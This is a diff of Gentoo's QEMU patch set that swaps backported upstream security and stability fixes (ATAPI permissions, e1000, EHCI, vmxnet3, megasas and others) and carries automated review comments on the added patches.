@@ -2872,7 +2872,7 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
pixman_image_get_width(vd->server));
int height = MIN(pixman_image_get_height(vd->guest.fb),
pixman_image_get_height(vd->server));
- int cmp_bytes, server_stride, min_stride, guest_stride, y = 0;
+ int cmp_bytes, server_stride, line_bytes, guest_ll, guest_stride, y = 0;
uint8_t *guest_row0 = NULL, *server_row0;
VncState *vs;
int has_dirty = 0;
@@ -2891,17 +2891,21 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
* Update server dirty map.
*/
server_row0 = (uint8_t *)pixman_image_get_data(vd->server);
- server_stride = guest_stride = pixman_image_get_stride(vd->server);
+ server_stride = guest_stride = guest_ll =
+ pixman_image_get_stride(vd->server);
cmp_bytes = MIN(VNC_DIRTY_PIXELS_PER_BIT * VNC_SERVER_FB_BYTES,
server_stride);
if (vd->guest.format != VNC_SERVER_FB_FORMAT) {
int width = pixman_image_get_width(vd->server);
tmpbuf = qemu_pixman_linebuf_create(VNC_SERVER_FB_FORMAT, width);
} else {
+ int guest_bpp =
+ PIXMAN_FORMAT_BPP(pixman_image_get_format(vd->guest.fb));
guest_row0 = (uint8_t *)pixman_image_get_data(vd->guest.fb);
guest_stride = pixman_image_get_stride(vd->guest.fb);
+ guest_ll = pixman_image_get_width(vd->guest.fb) * ((guest_bpp + 7) / 8);
}
- min_stride = MIN(server_stride, guest_stride);
+ line_bytes = MIN(server_stride, guest_ll);
for (;;) {
int x;
@@ -2932,9 +2936,10 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
if (!test_and_clear_bit(x, vd->guest.dirty[y])) {
continue;
}
- if ((x + 1) * cmp_bytes > min_stride) {
- _cmp_bytes = min_stride - x * cmp_bytes;
+ if ((x + 1) * cmp_bytes > line_bytes) {
+ _cmp_bytes = line_bytes - x * cmp_bytes;
}
+ assert(_cmp_bytes >= 0);
if (memcmp(server_ptr, guest_ptr, _cmp_bytes) == 0) {
continue;
}
--
2.5.0

View File

@ -1,146 +0,0 @@
https://bugs.gentoo.org/560422
From d9033e1d3aa666c5071580617a57bd853c5d794a Mon Sep 17 00:00:00 2001
From: John Snow <jsnow@redhat.com>
Date: Thu, 17 Sep 2015 14:17:05 -0400
Subject: [PATCH] ide: fix ATAPI command permissions
We're a little too lenient with what we'll let an ATAPI drive handle.
Clamp down on the IDE command execution table to remove CD_OK permissions
from commands that are not and have never been ATAPI commands.
For ATAPI command validity, please see:
- ATA4 Section 6.5 ("PACKET Command feature set")
- ATA8/ACS Section 4.3 ("The PACKET feature set")
- ACS3 Section 4.3 ("The PACKET feature set")
ACS3 has a historical command validity table in Table B.4
("Historical Command Assignments") that can be referenced to find when
a command was introduced, deprecated, obsoleted, etc.
The only reference for ATAPI command validity is by checking that
version's PACKET feature set section.
ATAPI was introduced by T13 into ATA4, all commands retired prior to ATA4
therefore are assumed to have never been ATAPI commands.
Mandatory commands, as listed in ATA8-ACS3, are:
- DEVICE RESET
- EXECUTE DEVICE DIAGNOSTIC
- IDENTIFY DEVICE
- IDENTIFY PACKET DEVICE
- NOP
- PACKET
- READ SECTOR(S)
- SET FEATURES
Optional commands as listed in ATA8-ACS3, are:
- FLUSH CACHE
- READ LOG DMA EXT
- READ LOG EXT
- WRITE LOG DMA EXT
- WRITE LOG EXT
All other commands are illegal to send to an ATAPI device and should
be rejected by the device.
CD_OK removal justifications:
0x06 WIN_DSM Defined in ACS2. Not valid for ATAPI.
0x21 WIN_READ_ONCE Retired in ATA5. Not ATAPI in ATA4.
0x94 WIN_STANDBYNOW2 Retired in ATA4. Did not coexist with ATAPI.
0x95 WIN_IDLEIMMEDIATE2 Retired in ATA4. Did not coexist with ATAPI.
0x96 WIN_STANDBY2 Retired in ATA4. Did not coexist with ATAPI.
0x97 WIN_SETIDLE2 Retired in ATA4. Did not coexist with ATAPI.
0x98 WIN_CHECKPOWERMODE2 Retired in ATA4. Did not coexist with ATAPI.
0x99 WIN_SLEEPNOW2 Retired in ATA4. Did not coexist with ATAPI.
0xE0 WIN_STANDBYNOW1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE1 WIN_IDLEIMMDIATE Not part of ATAPI in ATA4, ACS or ACS3.
0xE2 WIN_STANDBY Not part of ATAPI in ATA4, ACS or ACS3.
0xE3 WIN_SETIDLE1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE4 WIN_CHECKPOWERMODE1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE5 WIN_SLEEPNOW1 Not part of ATAPI in ATA4, ACS or ACS3.
0xF8 WIN_READ_NATIVE_MAX Obsoleted in ACS3. Not ATAPI in ATA4 or ACS.
This patch fixes a divide by zero fault that can be caused by sending
the WIN_READ_NATIVE_MAX command to an ATAPI drive, which causes it to
attempt to use zeroed CHS values to perform sector arithmetic.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: John Snow <jsnow@redhat.com>
Reviewed-by: Markus Armbruster <armbru@redhat.com>
Message-id: 1441816082-21031-1-git-send-email-jsnow@redhat.com
CC: qemu-stable@nongnu.org
---
hw/ide/core.c | 30 +++++++++++++++---------------
1 file changed, 15 insertions(+), 15 deletions(-)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 8ba04df..1cc6945 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -1746,11 +1746,11 @@ static const struct {
} ide_cmd_table[0x100] = {
/* NOP not implemented, mandatory for CD */
[CFA_REQ_EXT_ERROR_CODE] = { cmd_cfa_req_ext_error_code, CFA_OK },
- [WIN_DSM] = { cmd_data_set_management, ALL_OK },
+ [WIN_DSM] = { cmd_data_set_management, HD_CFA_OK },
[WIN_DEVICE_RESET] = { cmd_device_reset, CD_OK },
[WIN_RECAL] = { cmd_nop, HD_CFA_OK | SET_DSC},
[WIN_READ] = { cmd_read_pio, ALL_OK },
- [WIN_READ_ONCE] = { cmd_read_pio, ALL_OK },
+ [WIN_READ_ONCE] = { cmd_read_pio, HD_CFA_OK },
[WIN_READ_EXT] = { cmd_read_pio, HD_CFA_OK },
[WIN_READDMA_EXT] = { cmd_read_dma, HD_CFA_OK },
[WIN_READ_NATIVE_MAX_EXT] = { cmd_read_native_max, HD_CFA_OK | SET_DSC },
@@ -1769,12 +1769,12 @@ static const struct {
[CFA_TRANSLATE_SECTOR] = { cmd_cfa_translate_sector, CFA_OK },
[WIN_DIAGNOSE] = { cmd_exec_dev_diagnostic, ALL_OK },
[WIN_SPECIFY] = { cmd_nop, HD_CFA_OK | SET_DSC },
- [WIN_STANDBYNOW2] = { cmd_nop, ALL_OK },
- [WIN_IDLEIMMEDIATE2] = { cmd_nop, ALL_OK },
- [WIN_STANDBY2] = { cmd_nop, ALL_OK },
- [WIN_SETIDLE2] = { cmd_nop, ALL_OK },
- [WIN_CHECKPOWERMODE2] = { cmd_check_power_mode, ALL_OK | SET_DSC },
- [WIN_SLEEPNOW2] = { cmd_nop, ALL_OK },
+ [WIN_STANDBYNOW2] = { cmd_nop, HD_CFA_OK },
+ [WIN_IDLEIMMEDIATE2] = { cmd_nop, HD_CFA_OK },
+ [WIN_STANDBY2] = { cmd_nop, HD_CFA_OK },
+ [WIN_SETIDLE2] = { cmd_nop, HD_CFA_OK },
+ [WIN_CHECKPOWERMODE2] = { cmd_check_power_mode, HD_CFA_OK | SET_DSC },
+ [WIN_SLEEPNOW2] = { cmd_nop, HD_CFA_OK },
[WIN_PACKETCMD] = { cmd_packet, CD_OK },
[WIN_PIDENTIFY] = { cmd_identify_packet, CD_OK },
[WIN_SMART] = { cmd_smart, HD_CFA_OK | SET_DSC },
@@ -1788,19 +1788,19 @@ static const struct {
[WIN_WRITEDMA] = { cmd_write_dma, HD_CFA_OK },
[WIN_WRITEDMA_ONCE] = { cmd_write_dma, HD_CFA_OK },
[CFA_WRITE_MULTI_WO_ERASE] = { cmd_write_multiple, CFA_OK },
- [WIN_STANDBYNOW1] = { cmd_nop, ALL_OK },
- [WIN_IDLEIMMEDIATE] = { cmd_nop, ALL_OK },
- [WIN_STANDBY] = { cmd_nop, ALL_OK },
- [WIN_SETIDLE1] = { cmd_nop, ALL_OK },
- [WIN_CHECKPOWERMODE1] = { cmd_check_power_mode, ALL_OK | SET_DSC },
- [WIN_SLEEPNOW1] = { cmd_nop, ALL_OK },
+ [WIN_STANDBYNOW1] = { cmd_nop, HD_CFA_OK },
+ [WIN_IDLEIMMEDIATE] = { cmd_nop, HD_CFA_OK },
+ [WIN_STANDBY] = { cmd_nop, HD_CFA_OK },
+ [WIN_SETIDLE1] = { cmd_nop, HD_CFA_OK },
+ [WIN_CHECKPOWERMODE1] = { cmd_check_power_mode, HD_CFA_OK | SET_DSC },
+ [WIN_SLEEPNOW1] = { cmd_nop, HD_CFA_OK },
[WIN_FLUSH_CACHE] = { cmd_flush_cache, ALL_OK },
[WIN_FLUSH_CACHE_EXT] = { cmd_flush_cache, HD_CFA_OK },
[WIN_IDENTIFY] = { cmd_identify, ALL_OK },
[WIN_SETFEATURES] = { cmd_set_features, ALL_OK | SET_DSC },
[IBM_SENSE_CONDITION] = { cmd_ibm_sense_condition, CFA_OK | SET_DSC },
[CFA_WEAR_LEVEL] = { cmd_cfa_erase_sectors, HD_CFA_OK | SET_DSC },
- [WIN_READ_NATIVE_MAX] = { cmd_read_native_max, ALL_OK | SET_DSC },
+ [WIN_READ_NATIVE_MAX] = { cmd_read_native_max, HD_CFA_OK | SET_DSC },
};
static bool ide_cmd_permitted(IDEState *s, uint32_t cmd)
--
2.6.0.rc2.230.g3dd15c0


@ -1,58 +0,0 @@
https://bugs.gentoo.org/560760
From ce317461573bac12b10d67699b4ddf1f97cf066c Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:28 +0800
Subject: [PATCH 1/3] virtio: introduce virtqueue_unmap_sg()
Factor out sg unmapping logic. This will be reused by the patch that
can discard descriptor.
Cc: Michael S. Tsirkin <mst@redhat.com>
Cc: Andrew James <andrew.james@hpe.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/virtio/virtio.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 7504f8b..6f2b96c 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -244,14 +244,12 @@ int virtio_queue_empty(VirtQueue *vq)
return vring_avail_idx(vq) == vq->last_avail_idx;
}
-void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
- unsigned int len, unsigned int idx)
+static void virtqueue_unmap_sg(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len)
{
unsigned int offset;
int i;
- trace_virtqueue_fill(vq, elem, len, idx);
-
offset = 0;
for (i = 0; i < elem->in_num; i++) {
size_t size = MIN(len - offset, elem->in_sg[i].iov_len);
@@ -267,6 +265,14 @@ void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
cpu_physical_memory_unmap(elem->out_sg[i].iov_base,
elem->out_sg[i].iov_len,
0, elem->out_sg[i].iov_len);
+}
+
+void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len, unsigned int idx)
+{
+ trace_virtqueue_fill(vq, elem, len, idx);
+
+ virtqueue_unmap_sg(vq, elem, len);
idx = (idx + vring_used_idx(vq)) % vq->vring.num;
--
2.6.0.rc2.230.g3dd15c0


@ -1,54 +0,0 @@
https://bugs.gentoo.org/560760
From 29b9f5efd78ae0f9cc02dd169b6e80d2c404bade Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:29 +0800
Subject: [PATCH 2/3] virtio: introduce virtqueue_discard()
This patch introduces virtqueue_discard() to discard a descriptor and
unmap the sgs. This will be used by the patch that will discard
descriptor when packet is truncated.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/virtio/virtio.c | 7 +++++++
include/hw/virtio/virtio.h | 2 ++
2 files changed, 9 insertions(+)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 6f2b96c..d0bc72e 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -267,6 +267,13 @@ static void virtqueue_unmap_sg(VirtQueue *vq, const VirtQueueElement *elem,
0, elem->out_sg[i].iov_len);
}
+void virtqueue_discard(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len)
+{
+ vq->last_avail_idx--;
+ virtqueue_unmap_sg(vq, elem, len);
+}
+
void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len, unsigned int idx)
{
diff --git a/include/hw/virtio/virtio.h b/include/hw/virtio/virtio.h
index 6201ee8..9d09115 100644
--- a/include/hw/virtio/virtio.h
+++ b/include/hw/virtio/virtio.h
@@ -146,6 +146,8 @@ void virtio_del_queue(VirtIODevice *vdev, int n);
void virtqueue_push(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len);
void virtqueue_flush(VirtQueue *vq, unsigned int count);
+void virtqueue_discard(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len);
void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len, unsigned int idx);
--
2.6.0.rc2.230.g3dd15c0


@ -1,47 +0,0 @@
https://bugs.gentoo.org/560760
From 0cf33fb6b49a19de32859e2cdc6021334f448fb3 Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:30 +0800
Subject: [PATCH 3/3] virtio-net: correctly drop truncated packets
When packet is truncated during receiving, we drop the packets but
neither discard the descriptor nor add and signal used
descriptor. This will lead several issues:
- sg mappings are leaked
- rx will be stalled if a lots of packets were truncated
In order to be consistent with vhost, fix by discarding the descriptor
in this case.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/net/virtio-net.c | 8 +-------
1 file changed, 1 insertion(+), 7 deletions(-)
diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
index d388c55..a877614 100644
--- a/hw/net/virtio-net.c
+++ b/hw/net/virtio-net.c
@@ -1094,13 +1094,7 @@ static ssize_t virtio_net_receive(NetClientState *nc, const uint8_t *buf, size_t
* must have consumed the complete packet.
* Otherwise, drop it. */
if (!n->mergeable_rx_bufs && offset < size) {
-#if 0
- error_report("virtio-net truncated non-mergeable packet: "
- "i %zd mergeable %d offset %zd, size %zd, "
- "guest hdr len %zd, host hdr len %zd",
- i, n->mergeable_rx_bufs,
- offset, size, n->guest_hdr_len, n->host_hdr_len);
-#endif
+ virtqueue_discard(q->rx_vq, &elem, total);
return size;
}
--
2.6.0.rc2.230.g3dd15c0


@ -1,124 +0,0 @@
https://bugs.gentoo.org/558396
fix from upstream git
From e424aff5f307227b1c2512bbb8ece891bb895cef Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Thu, 13 Aug 2015 10:41:50 +0200
Subject: [PATCH] mirror: Fix coroutine reentrance
This fixes a regression introduced by commit dcfb3beb ("mirror: Do zero
write on target if sectors not allocated"), which was reported to cause
aborts with the message "Co-routine re-entered recursively".
The cause for this bug is the following code in mirror_iteration_done():
if (s->common.busy) {
qemu_coroutine_enter(s->common.co, NULL);
}
This has always been ugly because - unlike most places that reenter - it
doesn't have a specific yield that it pairs with, but is more
uncontrolled. What we really mean here is "reenter the coroutine if
it's in one of the four explicit yields in mirror.c".
This used to be equivalent with s->common.busy because neither
mirror_run() nor mirror_iteration() call any function that could yield.
However since commit dcfb3beb this doesn't hold true any more:
bdrv_get_block_status_above() can yield.
So what happens is that bdrv_get_block_status_above() wants to take a
lock that is already held, so it adds itself to the queue of waiting
coroutines and yields. Instead of being woken up by the unlock function,
however, it gets woken up by mirror_iteration_done(), which is obviously
wrong.
In most cases the code actually happens to cope fairly well with such
cases, but in this specific case, the unlock must already have scheduled
the coroutine for wakeup when mirror_iteration_done() reentered it. And
then the coroutine happened to process the scheduled restarts and tried
to reenter itself recursively.
This patch fixes the problem by pairing the reenter in
mirror_iteration_done() with specific yields instead of abusing
s->common.busy.
Cc: qemu-stable@nongnu.org
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Reviewed-by: Jeff Cody <jcody@redhat.com>
Message-id: 1439455310-11263-1-git-send-email-kwolf@redhat.com
Signed-off-by: Jeff Cody <jcody@redhat.com>
---
block/mirror.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/block/mirror.c b/block/mirror.c
index 0841964..9474443 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -60,6 +60,7 @@ typedef struct MirrorBlockJob {
int sectors_in_flight;
int ret;
bool unmap;
+ bool waiting_for_io;
} MirrorBlockJob;
typedef struct MirrorOp {
@@ -114,11 +115,7 @@ static void mirror_iteration_done(MirrorOp *op, int ret)
qemu_iovec_destroy(&op->qiov);
g_slice_free(MirrorOp, op);
- /* Enter coroutine when it is not sleeping. The coroutine sleeps to
- * rate-limit itself. The coroutine will eventually resume since there is
- * a sleep timeout so don't wake it early.
- */
- if (s->common.busy) {
+ if (s->waiting_for_io) {
qemu_coroutine_enter(s->common.co, NULL);
}
}
@@ -203,7 +200,9 @@ static uint64_t coroutine_fn mirror_iteration(MirrorBlockJob *s)
/* Wait for I/O to this cluster (from a previous iteration) to be done. */
while (test_bit(next_chunk, s->in_flight_bitmap)) {
trace_mirror_yield_in_flight(s, sector_num, s->in_flight);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
do {
@@ -239,7 +238,9 @@ static uint64_t coroutine_fn mirror_iteration(MirrorBlockJob *s)
*/
while (nb_chunks == 0 && s->buf_free_count < added_chunks) {
trace_mirror_yield_buf_busy(s, nb_chunks, s->in_flight);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
if (s->buf_free_count < nb_chunks + added_chunks) {
trace_mirror_break_buf_busy(s, nb_chunks, s->in_flight);
@@ -337,7 +338,9 @@ static void mirror_free_init(MirrorBlockJob *s)
static void mirror_drain(MirrorBlockJob *s)
{
while (s->in_flight > 0) {
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
}
@@ -510,7 +513,9 @@ static void coroutine_fn mirror_run(void *opaque)
if (s->in_flight == MAX_IN_FLIGHT || s->buf_free_count == 0 ||
(cnt == 0 && s->in_flight > 0)) {
trace_mirror_yield(s, s->in_flight, s->buf_free_count, cnt);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
continue;
} else if (cnt != 0) {
delay_ns = mirror_iteration(s);
--
2.5.0


@ -1,39 +0,0 @@
https://bugs.gentoo.org/559656
https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg01199.html
From: Stefan Hajnoczi <stefanha@redhat.com>
Subject: [PATCH] e1000: Avoid infinite loop in processing transmit descriptor
Newsgroups: gmane.comp.emulators.qemu
Date: 2015-09-04 16:21:06 GMT (2 days, 12 hours and 51 minutes ago)
From: P J P <pjp@fedoraproject.org>
While processing transmit descriptors, it could lead to an infinite
loop if 'bytes' was to become zero; Add a check to avoid it.
[The guest can force 'bytes' to 0 by setting the hdr_len and mss
descriptor fields to 0.
--Stefan]
Signed-off-by: P J P <pjp@fedoraproject.org>
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/e1000.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/net/e1000.c b/hw/net/e1000.c
index 5c6bcd0..09c9e9d 100644
--- a/hw/net/e1000.c
+++ b/hw/net/e1000.c
@@ -740,7 +740,8 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
memmove(tp->data, tp->header, tp->hdr_len);
tp->size = tp->hdr_len;
}
- } while (split_size -= bytes);
+ split_size -= bytes;
+ } while (bytes && split_size);
} else if (!tp->tse && tp->cptse) {
// context descriptor TSE is not set, while data descriptor TSE is set
DBGOUT(TXERR, "TCP segmentation error\n");
--
2.4.3


@ -0,0 +1,34 @@
From 4b3a4f2d458ca5a7c6c16ac36a8d9ac22cc253d6 Mon Sep 17 00:00:00 2001
From: Greg Kurz <gkurz@linux.vnet.ibm.com>
Date: Wed, 23 Dec 2015 10:56:58 +0100
Subject: [PATCH] virtio-9p: use accessor to get thread_pool
The aio_context_new() function does not allocate a thread pool. This is
deferred to the first call to the aio_get_thread_pool() accessor. It is
hence forbidden to access the thread_pool field directly, as it may be
NULL. The accessor *must* be used always.
Fixes: ebac1202c95a4f1b76b6ef3f0f63926fa76e753e
Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
Tested-by: Michael Tokarev <mjt@tls.msk.ru>
Cc: qemu-stable@nongnu.org
Signed-off-by: Greg Kurz <gkurz@linux.vnet.ibm.com>
---
hw/9pfs/virtio-9p-coth.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/9pfs/virtio-9p-coth.c b/hw/9pfs/virtio-9p-coth.c
index fb6e8f8..ab9425c 100644
--- a/hw/9pfs/virtio-9p-coth.c
+++ b/hw/9pfs/virtio-9p-coth.c
@@ -36,6 +36,6 @@ static int coroutine_enter_func(void *arg)
void co_run_in_worker_bh(void *opaque)
{
Coroutine *co = opaque;
- thread_pool_submit_aio(qemu_get_aio_context()->thread_pool,
+ thread_pool_submit_aio(aio_get_thread_pool(qemu_get_aio_context()),
coroutine_enter_func, co, coroutine_enter_cb, co);
}
--
2.7.4
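Review bot: The header of this added patch file has no Gentoo bug reference, while sibling patch files in this commit open with a `https://bugs.gentoo.org/...` line; the megasas and sendkey patch files further down have the same gap. A first line of the form `https://bugs.gentoo.org/<bug-id>` (placeholder, the id is not on this page) would keep the downstream reason for carrying each patch traceable next to the upstream commit hash. On the code itself, only the call in `co_run_in_worker_bh` is switched to `aio_get_thread_pool()`; whether other direct reads of `->thread_pool` remain in the tree cannot be told from this hunk.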


@ -0,0 +1,50 @@
https://bugs.gentoo.org/568246
From 156a2e4dbffa85997636a7a39ef12da6f1b40254 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 14 Dec 2015 09:21:23 +0100
Subject: [PATCH] ehci: make idt processing more robust
Make ehci_process_itd return an error in case we didn't do any actual
iso transfer because we've found no active transaction. That'll avoid
ehci happily run in circles forever if the guest builds a loop out of
idts.
This is CVE-2015-8558.
Cc: qemu-stable@nongnu.org
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Tested-by: P J P <ppandit@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 4e2161b..d07f228 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1389,7 +1389,7 @@ static int ehci_process_itd(EHCIState *ehci,
{
USBDevice *dev;
USBEndpoint *ep;
- uint32_t i, len, pid, dir, devaddr, endp;
+ uint32_t i, len, pid, dir, devaddr, endp, xfers = 0;
uint32_t pg, off, ptr1, ptr2, max, mult;
ehci->periodic_sched_active = PERIODIC_ACTIVE;
@@ -1479,9 +1479,10 @@ static int ehci_process_itd(EHCIState *ehci,
ehci_raise_irq(ehci, USBSTS_INT);
}
itd->transact[i] &= ~ITD_XACT_ACTIVE;
+ xfers++;
}
}
- return 0;
+ return xfers ? 0 : -1;
}
--
2.6.2
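Review bot: The new `return xfers ? 0 : -1;` at the end of ehci_process_itd has no comment saying why zero processed transactions is an error; the reason is only given in the patch description. I would add above it `/* no active transaction found: fail so a guest-built itd loop cannot keep the schedule running forever */`. How the caller reacts to -1 is outside these hunks, so the termination guarantee should be confirmed there. The function body starts and ends outside the visible hunks.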


@ -0,0 +1,95 @@
https://bugs.gentoo.org/567868
From aa4a3dce1c88ed51b616806b8214b7c8428b7470 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Tue, 15 Dec 2015 12:27:54 +0530
Subject: [PATCH] net: vmxnet3: avoid memory leakage in activate_device
Vmxnet3 device emulator does not check if the device is active
before activating it, also it did not free the transmit & receive
buffers while deactivating the device, thus resulting in memory
leakage on the host. This patch fixes both these issues to avoid
host memory leakage.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Reviewed-by: Dmitry Fleytman <dmitry@daynix.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Cc: qemu-stable@nongnu.org
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/vmxnet3.c | 24 ++++++++++++++++--------
1 file changed, 16 insertions(+), 8 deletions(-)
diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
index a5dd79a..9c1adfc 100644
--- a/hw/net/vmxnet3.c
+++ b/hw/net/vmxnet3.c
@@ -1194,8 +1194,13 @@ static void vmxnet3_reset_mac(VMXNET3State *s)
static void vmxnet3_deactivate_device(VMXNET3State *s)
{
- VMW_CBPRN("Deactivating vmxnet3...");
- s->device_active = false;
+ if (s->device_active) {
+ VMW_CBPRN("Deactivating vmxnet3...");
+ vmxnet_tx_pkt_reset(s->tx_pkt);
+ vmxnet_tx_pkt_uninit(s->tx_pkt);
+ vmxnet_rx_pkt_uninit(s->rx_pkt);
+ s->device_active = false;
+ }
}
static void vmxnet3_reset(VMXNET3State *s)
@@ -1204,7 +1209,6 @@ static void vmxnet3_reset(VMXNET3State *s)
vmxnet3_deactivate_device(s);
vmxnet3_reset_interrupt_states(s);
- vmxnet_tx_pkt_reset(s->tx_pkt);
s->drv_shmem = 0;
s->tx_sop = true;
s->skip_current_tx_pkt = false;
@@ -1431,6 +1435,12 @@ static void vmxnet3_activate_device(VMXNET3State *s)
return;
}
+ /* Verify if device is active */
+ if (s->device_active) {
+ VMW_CFPRN("Vmxnet3 device is active");
+ return;
+ }
+
vmxnet3_adjust_by_guest_type(s);
vmxnet3_update_features(s);
vmxnet3_update_pm_state(s);
@@ -1627,7 +1637,7 @@ static void vmxnet3_handle_command(VMXNET3State *s, uint64_t cmd)
break;
case VMXNET3_CMD_QUIESCE_DEV:
- VMW_CBPRN("Set: VMXNET3_CMD_QUIESCE_DEV - pause the device");
+ VMW_CBPRN("Set: VMXNET3_CMD_QUIESCE_DEV - deactivate the device");
vmxnet3_deactivate_device(s);
break;
@@ -1741,7 +1751,7 @@ vmxnet3_io_bar1_write(void *opaque,
* shared address only after we get the high part
*/
if (val == 0) {
- s->device_active = false;
+ vmxnet3_deactivate_device(s);
}
s->temp_shared_guest_driver_memory = val;
s->drv_shmem = 0;
@@ -2021,9 +2031,7 @@ static bool vmxnet3_peer_has_vnet_hdr(VMXNET3State *s)
static void vmxnet3_net_uninit(VMXNET3State *s)
{
g_free(s->mcast_list);
- vmxnet_tx_pkt_reset(s->tx_pkt);
- vmxnet_tx_pkt_uninit(s->tx_pkt);
- vmxnet_rx_pkt_uninit(s->rx_pkt);
+ vmxnet3_deactivate_device(s);
qemu_del_nic(s->nic);
}
--
2.6.2
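Review bot: In vmxnet3_deactivate_device the packet objects are now released with `vmxnet_tx_pkt_uninit(s->tx_pkt)` and `vmxnet_rx_pkt_uninit(s->rx_pkt)` but the pointers stay in the state struct, so any guest-reachable path that touches them without first checking `s->device_active` would operate on freed memory. The visible hunks guard activation and the BAR1 write; the TX/RX processing paths are not shown, so this needs confirming there. Clearing the fields after release, `s->tx_pkt = NULL; s->rx_pkt = NULL;`, would make a stale use fail immediately instead of corrupting the heap, provided the pkt helpers tolerate NULL (not visible here). Note also that vmxnet3_reset no longer calls vmxnet_tx_pkt_reset when the device is already inactive.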


@ -0,0 +1,35 @@
From 36fef36b91f7ec0435215860f1458b5342ce2811 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Mon, 21 Dec 2015 15:13:13 +0530
Subject: [PATCH] scsi: initialise info object with appropriate size
While processing controller 'CTRL_GET_INFO' command, the routine
'megasas_ctrl_get_info' overflows the '&info' object size. Use its
appropriate size to null initialise it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-Id: <alpine.LFD.2.20.1512211501420.22471@wniryva>
Cc: qemu-stable@nongnu.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: P J P <ppandit@redhat.com>
---
hw/scsi/megasas.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/megasas.c b/hw/scsi/megasas.c
index d7dc667..576f56c 100644
--- a/hw/scsi/megasas.c
+++ b/hw/scsi/megasas.c
@@ -718,7 +718,7 @@ static int megasas_ctrl_get_info(MegasasState *s, MegasasCmd *cmd)
BusChild *kid;
int num_pd_disks = 0;
- memset(&info, 0x0, cmd->iov_size);
+ memset(&info, 0x0, dcmd_size);
if (cmd->iov_size < dcmd_size) {
trace_megasas_dcmd_invalid_xfer_len(cmd->index, cmd->iov_size,
dcmd_size);
--
2.7.4
